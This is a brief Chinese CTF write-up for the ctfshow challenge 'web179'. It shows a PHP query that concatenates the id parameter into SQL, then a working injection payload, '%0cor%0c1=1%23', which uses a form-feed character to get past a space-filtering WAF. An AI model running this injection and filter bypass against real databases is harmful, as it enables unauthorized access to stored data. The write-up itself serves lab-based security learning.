web179（空格过滤剩下%0c可以用）

查询语句

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单，不宜展示
  }

这次测试一轮下来，发现只有%0c可以用

'%0cor%0c1=1%23